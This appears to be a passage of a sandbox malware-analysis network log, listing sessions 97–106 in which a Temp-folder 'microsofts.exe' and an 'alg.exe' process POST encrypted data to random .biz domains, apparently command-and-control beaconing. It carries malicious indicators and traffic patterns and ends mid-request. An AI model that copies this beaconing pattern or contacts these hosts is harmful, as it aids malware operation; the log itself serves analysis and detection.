                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642319918 CET355OUTPOST /rujiughdxo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642338991 CET778OUTData Raw: aa 89 8c 13 7f 27 96 7f fe 02 00 00 33 c1 ae 8d 05 64 35 d6 59 f8 40 e1 00 bd f7 16 df 4d 54 e2 37 67 e8 f1 96 da 19 c6 71 26 fe 18 3b 24 9d 75 1d a2 b5 29 18 c9 2a b3 86 f1 6c 67 28 8a 6f 6c e7 19 e4 d5 4c 99 ee 89 e1 b3 b5 8b e6 72 a7 2b 23 5c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: '3d5Y@MT7gq&;$u)*lg(olLr+#\jef8QEG,T<t0ki|2sRX.A`b8ZfNgwM(u.H{9pZ29tW('31J*$h_",wM]jz=d
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.334265947 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=11da9677cc34dbc9fd9c359c4ee11996|173.254.250.76|1730822649|1730822649|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              97192.168.2.55976718.246.231.120801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988497019 CET348OUTPOST /bhfem HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988497019 CET828OUTData Raw: b4 a9 a3 d9 b6 d0 e4 30 30 03 00 00 db e6 13 76 fd 63 15 f3 be 3b 67 ac ac 31 58 fc 91 c0 87 ef 98 d1 0d 7f eb fc ad cb 83 6a 7c 36 b8 28 92 fc 8a 2c b9 d1 74 8e b8 94 67 fc 9c c2 ed 62 1e 43 df 4a ff a3 d4 2a e6 0d 3b ed 6d 7b 95 d4 10 5c c8 d3
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 00vc;g1Xj|6(,tgbCJ*;m{\hP&fvT[f]*z?!D@!VvPxs),L[Qm0K_H^0@cD`6u_#EN
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.810683966 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=67a8131cfb2530541b9820e34d33661c|173.254.250.76|1730822649|1730822649|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              98192.168.2.55976813.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.950536013 CET354OUTPOST /qlckdyepimpj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.950536966 CET778OUTData Raw: b2 85 ca 6d 20 60 07 91 fe 02 00 00 1b 2f cb 33 84 f2 6d bc 7e b6 aa 1c ac 33 de e0 7f c9 5f 91 31 b8 6c 3b 66 a6 c0 29 cb be 0b 3f 57 5a af de 37 37 c5 e0 31 2e 41 85 03 fb 17 35 4a 47 1c 4a 43 01 fe 01 f8 a5 97 02 db 14 55 d2 22 e3 88 72 7a 1d
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: m `/3m~3_1l;f)?WZ771.A5JGJCU"rz 3XIjqcNH_NRP/8=3#-y2p;BaAzxJOS!R!a?@,f)ktjN2wX#9&vi{}>U(*{"_
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.366755009 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=327166ddd77f6eb4ce7c1e5833c86bb4|173.254.250.76|1730822651|1730822651|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              99192.168.2.5597693.254.94.185801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978607893 CET346OUTPOST /ityan HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978621960 CET828OUTData Raw: d8 d5 9f 6e 2f 50 ef 7c 30 03 00 00 fa b3 f6 6e 22 41 96 e2 15 bc 7a db 5d 46 f7 8c e0 2a 11 68 35 3e ea be e9 cd 99 90 83 a1 ca 1a 28 6e 52 71 ee 70 ed 2c f8 c5 fc c3 27 42 e4 38 d6 5f 66 2a 76 34 ea e4 be 59 0a 79 0f 36 99 5d 13 ae aa d0 d5 47
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n/P|0n"Az]F*h5>(nRqp,'B8_f*v4Yy6]G?X-o9fW%wm&^'hRjwpYsjB~Cj=R5]B#RaHn\du@kspZ0{vs&2CZ%>P538c>V.rBp
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.946290970 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4935cd6f2dd3c2fd176a1c1690463b27|173.254.250.76|1730822650|1730822650|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              100192.168.2.55977185.214.228.140801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.044851065 CET360OUTPOST /mfjpaqkdwglsvxqo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.044873953 CET828OUTData Raw: 6f ca 85 a0 58 45 b1 88 30 03 00 00 f3 fe 7f 19 d7 32 0c 4b 54 62 64 e7 dc 13 ec dd 4c a4 a6 02 1d 19 40 cb 93 5b 2e 99 d4 80 ae 5e c6 b6 ae ad 00 4b 7e 1d 5d 25 7f be 63 5c aa e5 68 73 b1 61 1a df a9 96 92 17 d7 85 c2 0f ff 16 87 ae 32 3c e3 32
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oXE02KTbdL@[.^K~]%c\hsa2<2hrW,ubuKYbR4,0^bKpY}O$0:EO@4?.r\\`&+h'xbGm)-Gij9y:dccAO+XG
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.918653965 CET166INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              101192.168.2.55977234.246.200.160801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.626034021 CET361OUTPOST /qowwyqvurlxrxabk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.626050949 CET778OUTData Raw: 4e 78 be d1 56 38 32 97 fe 02 00 00 50 21 53 76 05 a8 ac 6b f8 16 f9 35 cb 51 91 26 a2 ea 0f 7e 0f c2 30 aa 0d 4e ab 91 ba 84 e5 de 38 76 93 d9 2d d9 ca 06 97 c6 0f 1d 84 5b 78 ae 05 96 40 3f 2c 74 ae d5 47 19 9e c5 37 e8 38 07 c3 9b 38 88 b9 4a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: NxV82P!Svk5Q&~0N8v-[x@?,tG788Jz8|}"h{:G)UGKFkfgws$Pz;5JjVPsfkVDzo"}uiJ_%QnFc:AR*>P3K-a70`c<xt%i}h
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.593164921 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=775d358f99a07bf3d64defe30af32001|173.254.250.76|1730822652|1730822652|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              102192.168.2.55977347.129.31.212801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.998214960 CET354OUTPOST /tdrxmaergnh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.998214960 CET828OUTData Raw: 3a 23 aa 7f 34 26 0c 5c 30 03 00 00 d4 a8 5c ae e6 8f 42 c4 47 8a 00 10 de a8 d0 14 72 82 5e a9 6c 96 74 71 d5 31 8c 96 37 9f 9f 7e 81 44 06 23 a5 6c d0 aa a3 26 f7 d1 fa b3 85 bc 46 98 02 7f c6 20 07 56 1d 7a 5b 3a 42 c9 24 48 15 f8 04 81 e4 96
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :#4&\0\BGr^ltq17~D#l&F Vz[:B$Hct{^-W~"gfZk;6wFKLU{;,ER684.9;6[!86%|<1*A%aZ^/(F4.3Iwr<0.WPqA:T
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.429471016 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1e243ba5d90e62253356128fb9c7eeb1|173.254.250.76|1730822653|1730822653|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              103192.168.2.55977418.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.194984913 CET351OUTPOST /afeeapyp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.195009947 CET778OUTData Raw: ba b8 f9 75 74 8e aa 09 fe 02 00 00 5d 0c c1 91 9a d4 31 e9 09 df 26 82 f1 41 52 64 a5 64 05 b9 5b 21 6d e4 f1 b2 d3 91 a3 5e 59 2f be fa 74 73 bb bd e2 b8 21 6d a8 28 19 dd 3d cc 9c e1 54 a3 8d 6f 96 35 56 60 67 c3 98 c0 c0 3e 1a bb 9b a7 55 39
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ut]1&ARdd[!m^Y/ts!m(=To5V`g>U9"Cu(Lf=)2{zRc Ml*,.UmP>`FnG{aTo3ju'g^RADv9t?KlwH:VPdS\)1(3fp`Ut]Pr+
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.644968033 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2ba431b9253624f77204bad1403bdcf8|173.254.250.76|1730822654|1730822654|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              104192.168.2.55977534.211.97.45801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.487149954 CET357OUTPOST /obhmtmpkhrufyuif HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.487179041 CET828OUTData Raw: cf e4 96 1f 5a 17 c2 8c 30 03 00 00 c1 69 cf d3 b5 d9 84 0b 24 71 07 07 20 7a c6 c8 79 18 76 f2 fe f9 5b bd cd dc 73 f7 4c 06 41 b0 42 bf 61 0d 16 a3 4e 2f 99 c9 76 09 52 57 8e 26 f7 dc e5 2a 12 12 6b 81 2a 0a ea 45 06 99 d4 6d 04 f3 c7 92 55 6e
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Z0i$q zyv[sLABaN/vRW&*k*EmUn'pM70p*;ke7VY3bQV*UyCgV3&(q}k@+y\c?z-xgh9FML!;Vw|T!Miz2iPY[[w
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.314207077 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c506c0f85a4cbb7625571620e6645a15|173.254.250.76|1730822654|1730822654|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              105192.168.2.55977647.129.31.212801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.351274014 CET352OUTPOST /rwhorjnmac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.351294994 CET828OUTData Raw: b9 12 79 9e 15 2d d9 aa 30 03 00 00 8c e8 9b c8 27 ea 56 bf a2 b4 bb 74 3c 2d ae e9 b8 3c 05 7a fd f2 60 52 82 4d a0 ae ce 82 a0 a7 f8 6d 35 5a c7 28 70 5f 78 af 16 ec d4 49 45 33 34 71 b8 c8 4f f5 a2 8e 1c 78 fa b0 fd bc dd 0b e4 98 4a c6 ad 8e
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: y-0'Vt<-<z`RMm5Z(p_xIE34qOxJ4\`YmDUX^;>.X!u!U|HDtY(Ej>@j-tx]`\K8#*3t2$l~!gCl`#T(x,"DZ>Lv"9O,Y
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.799179077 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=fefb4c39f9cd157dbe003da06f002ef6|173.254.250.76|1730822655|1730822655|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              106192.168.2.55977713.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.062376022 CET344OUTPOST /rgh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
